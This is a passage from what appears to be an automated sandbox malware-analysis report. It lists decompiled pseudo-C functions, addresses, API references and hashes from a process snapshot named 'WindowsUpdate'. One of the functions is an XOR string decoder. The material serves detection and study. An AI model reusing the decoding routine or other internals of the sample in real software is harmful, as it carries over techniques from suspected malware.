					 *((intOrPtr*)(E003B0A4A())) = 0x16;
					_t37 = E003B09DB() | 0xffffffff;
				}
				return E003B2941(_t37);
			}











                                                                                                                    0x003add09
                                                                                                                    0x003add0b
                                                                                                                    0x003add10
                                                                                                                    0x003add1f
                                                                                                                    0x003add3b
                                                                                                                    0x003add43
                                                                                                                    0x003add45
                                                                                                                    0x00000000
                                                                                                                    0x003add47
                                                                                                                    0x003add47
                                                                                                                    0x003add4b
                                                                                                                    0x003addac
                                                                                                                    0x003addb4
                                                                                                                    0x003addb6
                                                                                                                    0x003addba
                                                                                                                    0x003addc1
                                                                                                                    0x003addc6
                                                                                                                    0x003addd9
                                                                                                                    0x003addde
                                                                                                                    0x003adde6
                                                                                                                    0x003added
                                                                                                                    0x003addf4
                                                                                                                    0x003addfa
                                                                                                                    0x003addfa
                                                                                                                    0x003add4d
                                                                                                                    0x003add4e
                                                                                                                    0x003add54
                                                                                                                    0x003add56
                                                                                                                    0x003add59
                                                                                                                    0x003add74
                                                                                                                    0x003add74
                                                                                                                    0x003add5b
                                                                                                                    0x003add5b
                                                                                                                    0x003add5e
                                                                                                                    0x00000000
                                                                                                                    0x003add60
                                                                                                                    0x003add6b
                                                                                                                    0x003add6b
                                                                                                                    0x003add5e
                                                                                                                    0x003add79
                                                                                                                    0x003add7d
                                                                                                                    0x00000000
                                                                                                                    0x003add7f
                                                                                                                    0x003add7f
                                                                                                                    0x003add82
                                                                                                                    0x003add9d
                                                                                                                    0x003add9d
                                                                                                                    0x003add84
                                                                                                                    0x003add84
                                                                                                                    0x003add87
                                                                                                                    0x00000000
                                                                                                                    0x003add89
                                                                                                                    0x003add94
                                                                                                                    0x003add94
                                                                                                                    0x003add87
                                                                                                                    0x003adda2
                                                                                                                    0x003adda6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003adda6
                                                                                                                    0x003add7d
                                                                                                                    0x003add4b
                                                                                                                    0x003add21
                                                                                                                    0x003add21
                                                                                                                    0x003add26
                                                                                                                    0x003add31
                                                                                                                    0x003add31
                                                                                                                    0x003ade00

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __ftbuf__getptd_noexit__lock_file__stbuf_strlen
                                                                                                                    • String ID: @6H$@6H
                                                                                                                    • API String ID: 583463211-3440816193
                                                                                                                    • Opcode ID: 327e8a4bebd1dfa414da4e92ce065c79d205ae387f7221e7844e2ad90fe42299
                                                                                                                    • Instruction ID: e4cce54e08a09f9683a710e2ce2505689b02405960044c470e3fba3e6aa99dbe
                                                                                                                    • Opcode Fuzzy Hash: 327e8a4bebd1dfa414da4e92ce065c79d205ae387f7221e7844e2ad90fe42299
                                                                                                                    • Instruction Fuzzy Hash: E2214F719102045ADB276F788C0576E3E61EF87778F158768F5369EDE2E73889429204
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002F6977 Relevance: 10.1, Strings: 8, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E002F6977(intOrPtr* _a4) {
				void* _t4;
				signed char _t6;
				signed int _t11;
				intOrPtr* _t13;

				_t13 = _a4;
				_t11 = 0;
				_t4 = 0x63;
				if(_t13 == 0) {
					L26:
					return _t4;
				} else {
					_t6 =  *_t13;
					if(_t6 == 0) {
						goto L26;
					} else {
						do {
							_t11 = (_t11 << 8) + ( *((_t6 & 0x000000ff) + 0x472f30) & 0x000000ff);
							_t13 = _t13 + 1;
							if(_t11 != 0x63686172) {
								if(_t11 != 0x636c6f62) {
									if(_t11 != 0x74657874) {
										if(_t11 != 0x626c6f62) {
											if(_t11 != 0x7265616c) {
												if(_t11 != 0x666c6f61) {
													if(_t11 != 0x646f7562 || _t4 != 0x63) {
														goto L22;
													} else {
														_t4 = 0x65;
													}
												} else {
													if(_t4 != 0x63) {
														goto L22;
													} else {
														_t4 = 0x65;
													}
												}
											} else {
												if(_t4 != 0x63) {
													goto L22;
												} else {
													_t4 = 0x65;
												}
											}
										} else {
											if(_t4 == 0x63 || _t4 == 0x65) {
												_t4 = 0x62;
											} else {
												L22:
												if((_t11 & 0x00ffffff) == 0x696e74) {
													return 0x64;
												}
											}
										}
									} else {
										_t4 = 0x61;
									}
								} else {
									_t4 = 0x61;
								}
							} else {
								_t4 = 0x61;
							}
							_t6 =  *_t13;
						} while (_t6 != 0);
						return _t4;
					}
				}
			}







                                                                                                                    0x002f697b
                                                                                                                    0x002f697e
                                                                                                                    0x002f6980
                                                                                                                    0x002f6984
                                                                                                                    0x002f6a32
                                                                                                                    0x002f6a32
                                                                                                                    0x002f698a
                                                                                                                    0x002f698a
                                                                                                                    0x002f698e
                                                                                                                    0x00000000
                                                                                                                    0x002f6997
                                                                                                                    0x002f6997
                                                                                                                    0x002f69a4
                                                                                                                    0x002f69a6
                                                                                                                    0x002f69af
                                                                                                                    0x002f69bb
                                                                                                                    0x002f69c7
                                                                                                                    0x002f69d3
                                                                                                                    0x002f69e7
                                                                                                                    0x002f69f7
                                                                                                                    0x002f6a07
                                                                                                                    0x00000000
                                                                                                                    0x002f6a0d
                                                                                                                    0x002f6a0d
                                                                                                                    0x002f6a0d
                                                                                                                    0x002f69f9
                                                                                                                    0x002f69fb
                                                                                                                    0x00000000
                                                                                                                    0x002f69fd
                                                                                                                    0x002f69fd
                                                                                                                    0x002f69fd
                                                                                                                    0x002f69fb
                                                                                                                    0x002f69e9
                                                                                                                    0x002f69eb
                                                                                                                    0x00000000
                                                                                                                    0x002f69ed
                                                                                                                    0x002f69ed
                                                                                                                    0x002f69ed
                                                                                                                    0x002f69eb
                                                                                                                    0x002f69d5
                                                                                                                    0x002f69d7
                                                                                                                    0x002f69dd
                                                                                                                    0x002f6a11
                                                                                                                    0x002f6a11
                                                                                                                    0x002f6a1f
                                                                                                                    0x00000000
                                                                                                                    0x002f6a2e
                                                                                                                    0x002f6a1f
                                                                                                                    0x002f69d7
                                                                                                                    0x002f69c9
                                                                                                                    0x002f69c9
                                                                                                                    0x002f69c9
                                                                                                                    0x002f69bd
                                                                                                                    0x002f69bd
                                                                                                                    0x002f69bd
                                                                                                                    0x002f69b1
                                                                                                                    0x002f69b1
                                                                                                                    0x002f69b1
                                                                                                                    0x002f6a21
                                                                                                                    0x002f6a23
                                                                                                                    0x002f6a2d
                                                                                                                    0x002f6a2d
                                                                                                                    0x002f698e

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: aolf$bolb$bolc$buod$laer$rahc$tni$txet
                                                                                                                    • API String ID: 0-2685204555
                                                                                                                    • Opcode ID: 193eda4ff26643cb186817329ffe3e6c0bab4abed965136141e6db746d9bbf84
                                                                                                                    • Instruction ID: 5dbdde569521c0da2d650ec282ffb89416d37ac8712b4e6cd73a244023cdb484
                                                                                                                    • Opcode Fuzzy Hash: 193eda4ff26643cb186817329ffe3e6c0bab4abed965136141e6db746d9bbf84
                                                                                                                    • Instruction Fuzzy Hash: 4211C2289F811E428D314C5844981F9EBD7C9927E8B78D037C7A6BF20BCE614CB36A52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CC857 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 20%
                                                                                                                    			E002CC857(intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t3;
				void* _t8;
				void* _t14;
				void* _t19;
				intOrPtr _t20;
				void* _t21;
				intOrPtr _t22;
				void* _t23;

				_t22 = _a4;
				if(_t22 == 0) {
					E002CF2D7();
					_t3 =  *0x470104(0xfffffff5);
					 *0x470050(_t3, 0xa);
					_push(0x470d1c);
					_push(0x470d28);
					_push(0x470d34);
					_push(0x470d40);
					_push(0x470d48);
					E00329C53(_t19, _t21, _t22, __eflags);
					_push(0x470d68);
					E00329C53(_t19, _t21, _t22, __eflags);
					goto L6;
				} else {
					_t14 = E0032928A(0x4833ac, _t22, 0x470ba0);
					_t20 =  *0x4833ac;
					_t23 = _t23 + 0xc;
					if(_t20 == 0) {
						L4:
						return E002CEE77(0x470ba8, _t22);
					} else {
						_t30 = _t14;
						if(_t14 != 0) {
							goto L4;
						} else {
							_push(_t20);
							_push(0x470c20);
							E003293FA(_t19, _t21, _t22, _t30);
							_push( *0x4833ac);
							_push(0x470c78);
							E003293FA(_t19, _t21, _t22, _t30);
							_push( *0x4833ac);
							_push(0x470cc8);
							E003293FA(_t19, _t21, _t22, _t30);
							L6:
							E002CEAC7();
							_t31 = _t22;
							if(_t22 == 0) {
								_t8 =  *0x470104(0xfffffff5);
								 *0x470050(_t8, 0xf);
								_push(0x4703dc);
								_push(0x470e64);
								return E00329C53(_t19, _t21, _t22, __eflags);
							} else {
								_push(0x470de0);
								_push( *0x4833ac);
								E003292CF(_t19, _t21, _t22, _t31);
								_push(0x4703dc);
								_push(0x470e2c);
								_push( *0x4833ac);
								E003292CF(_t19, _t21, _t22, _t31);
								_push( *0x4833ac);
								return E00329010(_t19, _t21, _t22, _t31);
							}
						}
					}
				}
			}













                                                                                                                    0x002cc85b
                                                                                                                    0x002cc860
                                                                                                                    0x002cc8c1
                                                                                                                    0x002cc8c8
                                                                                                                    0x002cc8d1
                                                                                                                    0x002cc8d7
                                                                                                                    0x002cc8dc
                                                                                                                    0x002cc8e1
                                                                                                                    0x002cc8e6
                                                                                                                    0x002cc8eb
                                                                                                                    0x002cc8f0
                                                                                                                    0x002cc8f5
                                                                                                                    0x002cc8fa
                                                                                                                    0x00000000
                                                                                                                    0x002cc862
                                                                                                                    0x002cc86d
                                                                                                                    0x002cc872
                                                                                                                    0x002cc878
                                                                                                                    0x002cc87d
                                                                                                                    0x002cc8b0
                                                                                                                    0x002cc8c0
                                                                                                                    0x002cc87f
                                                                                                                    0x002cc87f
                                                                                                                    0x002cc881
                                                                                                                    0x00000000
                                                                                                                    0x002cc883
                                                                                                                    0x002cc883
                                                                                                                    0x002cc884
                                                                                                                    0x002cc889
                                                                                                                    0x002cc88e
                                                                                                                    0x002cc894
                                                                                                                    0x002cc899
                                                                                                                    0x002cc89e
                                                                                                                    0x002cc8a4
                                                                                                                    0x002cc8a9
                                                                                                                    0x002cc8ff
                                                                                                                    0x002cc902
                                                                                                                    0x002cc907
                                                                                                                    0x002cc909
                                                                                                                    0x002cc943
                                                                                                                    0x002cc94c
                                                                                                                    0x002cc952
                                                                                                                    0x002cc957
                                                                                                                    0x002cc966
                                                                                                                    0x002cc90b
                                                                                                                    0x002cc90b
                                                                                                                    0x002cc910
                                                                                                                    0x002cc916
                                                                                                                    0x002cc91b
                                                                                                                    0x002cc920
                                                                                                                    0x002cc925
                                                                                                                    0x002cc92b
                                                                                                                    0x002cc930
                                                                                                                    0x002cc940
                                                                                                                    0x002cc940
                                                                                                                    0x002cc909
                                                                                                                    0x002cc881
                                                                                                                    0x002cc87d

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 002CC86D
                                                                                                                    • _wprintf.LIBCMT ref: 002CC8F0
                                                                                                                    • _wprintf.LIBCMT ref: 002CC8FA
                                                                                                                    • _fprintf.LIBCMT ref: 002CC916
                                                                                                                    • _fprintf.LIBCMT ref: 002CC92B
                                                                                                                    • _wprintf.LIBCMT ref: 002CC95C
                                                                                                                      • Part of subcall function 003293FA: _strlen.LIBCMT ref: 003294A0
                                                                                                                      • Part of subcall function 003293FA: __lock_file.LIBCMT ref: 003294AB
                                                                                                                      • Part of subcall function 003293FA: __stbuf.LIBCMT ref: 003294B7
                                                                                                                      • Part of subcall function 003293FA: __ftbuf.LIBCMT ref: 003294CF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf$_fprintf$__ftbuf__lock_file__stbuf__wfopen_s_strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 718506414-0
                                                                                                                    • Opcode ID: ea00f4a27cb9882ad5ad3b50a20ff5e45250023bd1f1246198e9f6858b94b012
                                                                                                                    • Instruction ID: 8d3b860d1ffd4538206685a28ad40f73bee6db0f49ca45c578de2cd78ec24d41
                                                                                                                    • Opcode Fuzzy Hash: ea00f4a27cb9882ad5ad3b50a20ff5e45250023bd1f1246198e9f6858b94b012
                                                                                                                    • Instruction Fuzzy Hash: E1119032693725FECA123BE4BC03F9A36149B11F22F24862BF90DF40A299996550469E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002E4A67 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 207COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 17%
                                                                                                                    			E002E4A67(char _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _t61;
				void* _t62;
				char* _t69;
				signed int _t82;
				signed int _t87;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				char* _t101;
				intOrPtr _t103;
				void* _t105;
				intOrPtr _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				signed int _t110;
				signed int _t111;
				void* _t112;
				signed int _t114;
				intOrPtr* _t115;
				intOrPtr _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t128;
				void* _t129;

				_t61 = _a8;
				_t115 =  *((intOrPtr*)(_t61 + 0x10));
				_t110 =  *(_t61 + 0xc);
				_t100 = 0;
				_v32 = _t110;
				if(_t110 > 0) {
					do {
						_t109 =  *_t115;
						_t99 = 0;
						_t107 =  *_t109;
						while(_t107 != 0) {
							if(_t107 == 0x22) {
								_t99 = _t99 + 1;
							}
							_t107 =  *((intOrPtr*)(_t109 + 1));
							_t109 = _t109 + 1;
							_t99 = _t99 + 1;
						}
						_t100 = _t100 + 7 + _t99;
						_t115 = _t115 + 0x18;
						_t110 = _t110 - 1;
					} while (_t110 != 0);
					_t110 = _v32;
					_t61 = _a8;
				}
				_t108 =  *((intOrPtr*)(_t61 + 4));
				_t62 = 0;
				_t103 =  *_t108;
				while(_t103 != 0) {
					if(_t103 == 0x22) {
						_t62 = _t62 + 1;
					}
					_t103 =  *((intOrPtr*)(_t108 + 1));
					_t108 = _t108 + 1;
					_t62 = _t62 + 1;
				}
				_t10 = _t62 + 2; // 0x3
				_t105 = _t10 + _t100;
				if(_t105 >= 0x32) {
					_v12 = 0x477560;
					_v20 = 0x477564;
					_v32 = 0x47756c;
				} else {
					_v12 = 0x470859;
					_v20 = 0x477558;
					_v32 = 0x47755c;
				}
				_t117 = 0x23 + (_t110 + _t110 * 2) * 2 + _t105;
				_v28 = _t117;
				if(_t117 - 1 > 0x7ffffefe) {
					L42:
					_t59 =  &_a4; // 0x477560
					 *((char*)( *_t59 + 0x1e)) = 1;
					return 0;
				} else {
					if( *0x481808 == 0) {
						_t101 =  *0x481820(_t117);
						goto L25;
					} else {
						_t93 =  *0x481910;
						if(_t93 != 0) {
							 *0x481850(_t93);
							_t123 = _t123 + 4;
						}
						E002EB537(_t108, _t117,  &_v16);
						_t96 =  *0x481910;
						_t124 = _t123 + 8;
						if(_t96 == 0) {
							_t101 = _v16;
						} else {
							 *0x481858(_t96);
							_t101 = _v16;
							L25:
							_t124 = _t123 + 4;
						}
					}
					if(_t101 == 0) {
						goto L42;
					} else {
						_push(0x477570);
						_push(_t101);
						_push(_t117);
						E002D71A7();
						_t125 = _t124 + 0xc;
						_t69 = _t101;
						if( *_t101 != 0) {
							do {
								_t69 = _t69 + 1;
							} while ( *_t69 != 0);
						}
						_v8 = _t69 - _t101 & 0x3fffffff;
						E002E99A7(_t105, _t101,  &_v8,  *((intOrPtr*)(_a8 + 4)));
						_t111 = _v8;
						_t106 = _a8;
						 *((char*)(_t101 + _t111)) = 0x28;
						_t126 = _t125 + 0xc;
						_t112 = _t111 + 1;
						_v16 =  *((intOrPtr*)(_t106 + 0x10));
						_v24 = 0;
						if( *((intOrPtr*)(_t106 + 0xc)) > 0) {
							do {
								_t37 =  &_v12; // 0x477560
								_push( *_t37);
								_t119 = _t101 + _t112;
								_push(_t119);
								_push(_v28 - _t112);
								E002D71A7();
								_t128 = _t126 + 0xc;
								_t82 = _t119;
								if(_t119 != 0) {
									if( *_t119 != 0) {
										do {
											_t82 = _t82 + 1;
										} while ( *_t82 != 0);
									}
									_t82 = _t82 - _t119 & 0x3fffffff;
								}
								_t120 = _v16;
								_v12 = _v20;
								_v8 = _t112 + _t82;
								E002E99A7(_t106, _t101,  &_v8,  *_t120);
								_t129 = _t128 + 0xc;
								_t87 =  *(0x475038 +  *(_t120 + 0x16) * 4);
								_t121 = _t87;
								if(_t87 != 0) {
									if( *_t87 != 0) {
										do {
											_t121 = _t121 + 1;
										} while ( *_t121 != 0);
									}
									_t121 = _t121 - _t87 & 0x3fffffff;
								}
								_t114 = _v8;
								E00327337(_t101 + _t114, _t87, _t121);
								_t106 = _a8;
								_v16 = _v16 + 0x18;
								_t91 = _v24 + 1;
								_t126 = _t129 + 0xc;
								_t112 = _t114 + _t121;
								_v24 = _t91;
							} while (_t91 <  *((intOrPtr*)(_a8 + 0xc)));
							_t117 = _v28;
						}
						_t57 =  &_v32; // 0x47756c
						E002D71A7(_t117 - _t112, _t101 + _t112, 0x470310,  *_t57);
						return _t101;
					}
				}
			}









































                                                                                                                    0x002e4a6d
                                                                                                                    0x002e4a72
                                                                                                                    0x002e4a76
                                                                                                                    0x002e4a79
                                                                                                                    0x002e4a7b
                                                                                                                    0x002e4a80
                                                                                                                    0x002e4a87
                                                                                                                    0x002e4a87
                                                                                                                    0x002e4a89
                                                                                                                    0x002e4a8b
                                                                                                                    0x002e4a8f
                                                                                                                    0x002e4a9a
                                                                                                                    0x002e4a9c
                                                                                                                    0x002e4a9c
                                                                                                                    0x002e4a9d
                                                                                                                    0x002e4aa0
                                                                                                                    0x002e4aa1
                                                                                                                    0x002e4aa2
                                                                                                                    0x002e4aa9
                                                                                                                    0x002e4aab
                                                                                                                    0x002e4aae
                                                                                                                    0x002e4aae
                                                                                                                    0x002e4ab1
                                                                                                                    0x002e4ab4
                                                                                                                    0x002e4ab4
                                                                                                                    0x002e4ab7
                                                                                                                    0x002e4aba
                                                                                                                    0x002e4abc
                                                                                                                    0x002e4ac0
                                                                                                                    0x002e4aca
                                                                                                                    0x002e4acc
                                                                                                                    0x002e4acc
                                                                                                                    0x002e4acd
                                                                                                                    0x002e4ad0
                                                                                                                    0x002e4ad1
                                                                                                                    0x002e4ad2
                                                                                                                    0x002e4ad6
                                                                                                                    0x002e4ad9
                                                                                                                    0x002e4ade
                                                                                                                    0x002e4af7
                                                                                                                    0x002e4afe
                                                                                                                    0x002e4b05
                                                                                                                    0x002e4ae0
                                                                                                                    0x002e4ae0
                                                                                                                    0x002e4ae7
                                                                                                                    0x002e4aee
                                                                                                                    0x002e4aee
                                                                                                                    0x002e4b16
                                                                                                                    0x002e4b18
                                                                                                                    0x002e4b23
                                                                                                                    0x002e4c97
                                                                                                                    0x002e4c97
                                                                                                                    0x002e4c9c
                                                                                                                    0x002e4ca6
                                                                                                                    0x002e4b29
                                                                                                                    0x002e4b30
                                                                                                                    0x002e4b73
                                                                                                                    0x00000000
                                                                                                                    0x002e4b32
                                                                                                                    0x002e4b32
                                                                                                                    0x002e4b39
                                                                                                                    0x002e4b3c
                                                                                                                    0x002e4b42
                                                                                                                    0x002e4b42
                                                                                                                    0x002e4b4a
                                                                                                                    0x002e4b4f
                                                                                                                    0x002e4b54
                                                                                                                    0x002e4b59
                                                                                                                    0x002e4b67
                                                                                                                    0x002e4b5b
                                                                                                                    0x002e4b5c
                                                                                                                    0x002e4b62
                                                                                                                    0x002e4b75
                                                                                                                    0x002e4b75
                                                                                                                    0x002e4b75
                                                                                                                    0x002e4b59
                                                                                                                    0x002e4b7a
                                                                                                                    0x00000000
                                                                                                                    0x002e4b80
                                                                                                                    0x002e4b80
                                                                                                                    0x002e4b85
                                                                                                                    0x002e4b86
                                                                                                                    0x002e4b87
                                                                                                                    0x002e4b8c
                                                                                                                    0x002e4b92
                                                                                                                    0x002e4b94
                                                                                                                    0x002e4b97
                                                                                                                    0x002e4b97
                                                                                                                    0x002e4b98
                                                                                                                    0x002e4b97
                                                                                                                    0x002e4ba4
                                                                                                                    0x002e4bb2
                                                                                                                    0x002e4bb7
                                                                                                                    0x002e4bba
                                                                                                                    0x002e4bbd
                                                                                                                    0x002e4bc4
                                                                                                                    0x002e4bc7
                                                                                                                    0x002e4bcc
                                                                                                                    0x002e4bcf
                                                                                                                    0x002e4bd6
                                                                                                                    0x002e4bdc
                                                                                                                    0x002e4bdc
                                                                                                                    0x002e4bdc
                                                                                                                    0x002e4be2
                                                                                                                    0x002e4be7
                                                                                                                    0x002e4be8
                                                                                                                    0x002e4be9
                                                                                                                    0x002e4bee
                                                                                                                    0x002e4bf1
                                                                                                                    0x002e4bf5
                                                                                                                    0x002e4bfa
                                                                                                                    0x002e4bfc
                                                                                                                    0x002e4bfc
                                                                                                                    0x002e4bfd
                                                                                                                    0x002e4bfc
                                                                                                                    0x002e4c04
                                                                                                                    0x002e4c04
                                                                                                                    0x002e4c09
                                                                                                                    0x002e4c13
                                                                                                                    0x002e4c1b
                                                                                                                    0x002e4c1e
                                                                                                                    0x002e4c27
                                                                                                                    0x002e4c2a
                                                                                                                    0x002e4c31
                                                                                                                    0x002e4c35
                                                                                                                    0x002e4c3a
                                                                                                                    0x002e4c3c
                                                                                                                    0x002e4c3c
                                                                                                                    0x002e4c3d
                                                                                                                    0x002e4c3c
                                                                                                                    0x002e4c44
                                                                                                                    0x002e4c44
                                                                                                                    0x002e4c4a
                                                                                                                    0x002e4c53
                                                                                                                    0x002e4c5b
                                                                                                                    0x002e4c5e
                                                                                                                    0x002e4c62
                                                                                                                    0x002e4c63
                                                                                                                    0x002e4c66
                                                                                                                    0x002e4c68
                                                                                                                    0x002e4c6b
                                                                                                                    0x002e4c74
                                                                                                                    0x002e4c74
                                                                                                                    0x002e4c77
                                                                                                                    0x002e4c86
                                                                                                                    0x002e4c96
                                                                                                                    0x002e4c96
                                                                                                                    0x002e4b7a

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `uG$`uG$duG$luG
                                                                                                                    • API String ID: 0-3174765998
                                                                                                                    • Opcode ID: 36d05cb38f7993d812db7c8f678d5037fa29f5533ecc268c2669a41c54769fe8
                                                                                                                    • Instruction ID: 7cb6da20cb26b062ae523918f8f556dc33566944548be75d23a55420ddb7729a
                                                                                                                    • Opcode Fuzzy Hash: 36d05cb38f7993d812db7c8f678d5037fa29f5533ecc268c2669a41c54769fe8
                                                                                                                    • Instruction Fuzzy Hash: 17711871D5018A9FCB10DFA9C884BAEBBF8EF04314F6881AAD854D7301E375DA56CB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034F2AC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 74%
                                                                                                                    			E0034F2AC(intOrPtr* _a4, char* _a8, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v24;
				char _v32;
				char _v96;
				signed char _v97;
				signed int _v104;
				signed int _v108;
				char _v112;
				char* _v116;
				intOrPtr* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t57;
				signed int _t67;
				intOrPtr _t69;
				char* _t77;
				void* _t78;
				intOrPtr _t79;
				void* _t80;
				void* _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				void* _t88;
				signed int _t93;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr* _t102;
				void* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_v8 =  *0x482960 ^ _t108;
				asm("movq xmm0, [0x474884]");
				_t77 = _a8;
				_t102 = _a4;
				_v12 =  *0x47488c & 0x000000ff;
				asm("movq [ebp-0x10], xmm0");
				asm("movq xmm0, [0x474890]");
				_t82 = _t102;
				_v120 = _t102;
				_v116 = _t77;
				asm("movq [ebp-0x1c], xmm0");
				_v24 =  *0x474898 & 0x000000ff;
				_v112 = 0;
				_t97 = 0;
				_t95 = _t82 + 1;
				do {
					_t50 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t50 != 0);
				if(_t82 != _t95) {
					_t84 = _t102;
					_t95 = _t84 + 1;
					do {
						_t51 =  *_t84;
						_t84 = _t84 + 1;
					} while (_t51 != 0);
					if((_t84 - _t95 & 0x00000001) != 0) {
						goto L3;
					} else {
						if(_a12 == 0) {
							_t18 =  &_v20; // 0x34ec40
							E003AC711( &_v96, 0x40, _t18);
							_v97 = 0x5a;
						} else {
							E003AC711( &_v96, 0x40,  &_v32);
							_v97 = 0x71;
						}
						_t110 = _t109 + 0xc;
						 *_t77 = 0;
						_t88 = _t102 + 1;
						do {
							_t57 =  *_t102;
							_t102 = _t102 + 1;
						} while (_t57 != 0);
						_t79 = _v120;
						E003ADFDE(_t79, 0x47489c,  &_v108);
						_v108 = _v108 ^ _v97 & 0x000000ff;
						_t111 = _t110 + 0xc;
						_t80 = _t79 + 2;
						_t106 = (_t102 - _t88 >> 1) - 1;
						if(_t106 != 0) {
							do {
								_t106 = _t106 - 1;
								E003ADFDE(_t80, 0x47489c,  &_v104);
								_t93 = _v104 ^  *(_t108 + _t97 - 0x5c);
								_t67 = _v108;
								_t112 = _t111 + 0xc;
								_t100 = _t97 + 1;
								_v104 = _t93;
								if(_t67 >= _t93) {
									_t93 = _t93 - 1;
									_v104 = _t93;
								}
								_t95 = _v116;
								_t69 = _v112 + 1;
								 *((char*)(_v116 + _t69 - 1)) = _t93 - _t67;
								_v112 = _t69;
								E003ADFDE(_t80, 0x47489c,  &_v108);
								_t111 = _t112 + 0xc;
								_t80 = _t80 + 2;
								_t97 =  ==  ? 0 : _t100;
							} while (_t106 != 0);
						}
						_pop(_t99);
						 *((char*)(_v116 + _v112)) = 0;
						_pop(_t107);
						_pop(_t81);
						return E003ABE87(1, _t81, _v8 ^ _t108, _t95, _t99, _t107);
					}
				} else {
					L3:
					_pop(_t98);
					_pop(_t103);
					_pop(_t78);
					return E003ABE87(0, _t78, _v8 ^ _t108, _t95, _t98, _t103);
				}
			}













































                                                                                                                    0x0034f2b9
                                                                                                                    0x0034f2c3
                                                                                                                    0x0034f2cc
                                                                                                                    0x0034f2d0
                                                                                                                    0x0034f2d3
                                                                                                                    0x0034f2dd
                                                                                                                    0x0034f2e2
                                                                                                                    0x0034f2ea
                                                                                                                    0x0034f2ed
                                                                                                                    0x0034f2f0
                                                                                                                    0x0034f2f3
                                                                                                                    0x0034f2f8
                                                                                                                    0x0034f2fb
                                                                                                                    0x0034f302
                                                                                                                    0x0034f304
                                                                                                                    0x0034f30c
                                                                                                                    0x0034f30c
                                                                                                                    0x0034f30e
                                                                                                                    0x0034f30f
                                                                                                                    0x0034f315
                                                                                                                    0x0034f32a
                                                                                                                    0x0034f32c
                                                                                                                    0x0034f32f
                                                                                                                    0x0034f32f
                                                                                                                    0x0034f331
                                                                                                                    0x0034f332
                                                                                                                    0x0034f33b
                                                                                                                    0x00000000
                                                                                                                    0x0034f33d
                                                                                                                    0x0034f340
                                                                                                                    0x0034f357
                                                                                                                    0x0034f361
                                                                                                                    0x0034f366
                                                                                                                    0x0034f342
                                                                                                                    0x0034f34c
                                                                                                                    0x0034f351
                                                                                                                    0x0034f351
                                                                                                                    0x0034f36a
                                                                                                                    0x0034f36d
                                                                                                                    0x0034f370
